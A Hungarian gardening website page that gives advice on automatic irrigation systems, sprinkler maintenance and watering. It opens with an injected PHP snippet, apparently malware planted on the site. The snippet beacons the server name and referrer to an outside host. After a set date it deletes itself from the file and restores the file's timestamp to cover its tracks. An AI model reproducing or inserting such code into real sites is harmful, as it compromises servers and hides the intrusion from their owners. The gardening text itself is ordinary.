check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735622){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776892&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_feed/mode.php"); } Öntözés, öntözőrendszer

Az öntözőrendszer karbantartási igénye

 

ontozzokosan rotaryAmikor megtörtént a telepítés a rá következő hetekben, hónapokban a szórófejek körül a talaj még tömörödik, ha olyan mértékben történik a talaj tömörödése, hogy a szórófej a talajszintből kiáll az fűnyírásnál és a pázsit használatánál problémát okozhat, ezért ezeket újra be kell állítani a talajszinthez. Az öntözőrendszerbe beépítet szűrő tisztaságát legalább havonta célszerű ellenőrizni az üzembe helyezés utáni első évben. Az ellenőrzéseknél már megállapítható a vízforrás milyen mértékű szennyeződéseket tartalmaz. Későbbiekben ennek figyelembevételével lehet a szűrő tisztítási időpontját meghatározni. Általánosságban elmondható, hogy évi egyszeri alkalommal, a tavaszi beüzemelésnél elegendő ezt az ellenőrzést elvégezni. 

Bővebben...
 

Miért kell az öntözőrendszer?

ontozzokosan hunter

A kertben élni, megpihenni egy fárasztó nap után, talán nincs is annál csodálatosabb. A rohanó életritmusunk sokszor kevés szabadidővel hálálja meg az egész napos „rohanásunkat”. Talán már Te is gondolkodtál azon, hogy amikor hazaérkezel, milyen jól esne egy kis kikapcsolódás, megnyugvás a teraszon, egy pohár hűvös limonádét szürcsölgetve. Mit szólnál, ha egy láthatatlan segítő kéz megnyitná a kerti öntözőt és helyetted meglocsolná a füvet és a növényeket. Erre is megvan a megoldás.

Bővebben...
 

Amit az automata öntözőrendszerekről tudni kell

ontozzokosan ontozorendszerTalán Te is jártál úgy, hogy egy hosszabb nyaralás után hazatérve, esetleg csak időhiányból adódóan, az addig smaragdzöld pázsitod hervasztó látványa fogad. Hazánk éghajlata egyre aszályosabb, egyre hosszabbak  az esőmentes, csapadékhiányos időszakok. Ha a növényeink vízigényét optimális szinten szeretnénk tartani, akkor évi 400-600 mm pótlólagos öntözővíz kijuttatására van szükség. Ekkora vízmennyiség kiöntözése hagyományos kézi locsolással nagyon hosszú időt venne el az értékes, pihenésre szánt időnkből. Nem csak az ehhez szükséges idő hiánya, hanem a locsolás egyenlőtlensége is problémát jelent. Az automata öntözőrendszerekben alkalmazott szórófejekkel a kijuttatott vízmennyiség egyenletességét, intenzitását és eloszlását tökéletesen a növények és talaj igényéhez tudjuk igazítani. A kertünk mindig „használható” hiszen az öntözési időszakokat, időpontokat mi magunk állíthatjuk be. Így, az öntözésre legalkalmasabb időpontban a hajnali 4 és 9 óra közötti időben kerül sor.

Bővebben...
 

Az öntözés fontos!

 

ontozzokosan ontozoA megfelelő vízmennyiség kijuttatása. Ma ez a legnagyobb probléma! Sajnos csapadékban igen szegény időjárásunk van, pedig a mondás szerint a „májusi eső aranyat ér!” Ez így is van, mert egy jó kiadós zápor után teljesen megújul a kert. Szerencsések azok, akik kertjében fúrott, vagy ásott kerti kút van. Ha lehetőségünk van rá, akkor ne friss és főleg nem hideg vízzel öntözzünk. Állott vízzel, amit ciszternában, hordókban, tartályban tárolunk. Persze a csapadékvizet lenne a legjobb összegyűjteni, de az égiek most nem bőkezűek hozzánk. Itt érdemes megemlíteni a csepegtetős öntözést. 

Bővebben...
 
« ElsőElőző12KövetkezőUtolsó »

1. oldal / 2
Ugrás a lap tetejére

 


 Automata öntözőrendszer  | Öntözés  | Öntözéstechnika | Kertépítés | Füvesítés |  Kerttervezés  | Gyepszőnyeg | Gyeptrágya | Kerti tó | Sziklakert  | Szivattyú